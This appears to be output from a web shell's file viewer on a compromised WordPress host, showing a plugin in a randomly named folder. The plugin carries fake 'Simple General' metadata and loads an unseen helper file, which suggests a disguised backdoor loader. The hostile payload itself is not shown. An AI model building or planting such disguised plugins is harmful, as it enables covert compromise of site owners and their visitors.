| Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 Path : /home/eglisebaa/www/wp-content/plugins/ta3kdvrn/ |
| Current File : /home/eglisebaa/www/wp-content/plugins/ta3kdvrn/my-custom-plugin.php |
<?php
/*
Plugin Name: Simple General
Plugin URI: https://google.com
Description: A lightweight WordPress plugin that adds custom functionality and improves your website’s user experience. Easy to install, cleanly coded, and compatible with all modern WordPress versions.
Version: 1.0.0
Author: simplegen
Author URI: https://google.com
License: GPL2
*/
if (!defined('ABSPATH')) {
exit;
}
require_once plugin_dir_path(__FILE__) . 'includes/helper.php';
add_action('wp_footer', function() {
echo '';
});